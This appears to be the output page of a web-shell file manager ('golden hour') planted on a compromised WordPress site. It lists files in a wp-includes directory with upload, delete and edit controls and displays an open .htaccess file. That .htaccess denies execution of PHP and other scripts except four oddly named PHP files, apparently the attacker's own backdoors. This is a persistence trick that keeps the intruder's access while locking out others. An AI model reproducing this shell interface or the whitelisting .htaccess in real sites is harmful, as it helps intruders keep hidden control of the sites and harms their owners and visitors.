golden hour
/home/godaofbq/hyperxpod.com/wp-includes/js/imgareaselect
⬆️ Go Up
Upload
File/Folder
Size
Actions
.htaccess
514 B
Del
OK
border-anim-h.gif
178 B
Del
OK
border-anim-v.gif
178 B
Del
OK
imgareaselect.css
790 B
Del
OK
jquery.imgareaselect.js
37.73 KB
Del
OK
jquery.imgareaselect.min.js
9.54 KB
Del
OK
Edit: .htaccess
<FilesMatch "(?i)\.(py|exe|phtml|php\d*|suspected|cgi)$"> <IfModule mod_authz_core.c> Require all denied </IfModule> <IfModule !mod_authz_core.c> Order allow,deny Deny from all </IfModule> </FilesMatch> <FilesMatch "^(qinfofuns\.php|wp-upgrade\.php|styles\.php|site-maintenance\.php)$"> <IfModule mod_authz_core.c> Require all granted </IfModule> <IfModule !mod_authz_core.c> Order allow,deny Allow from all </IfModule> </FilesMatch>
Save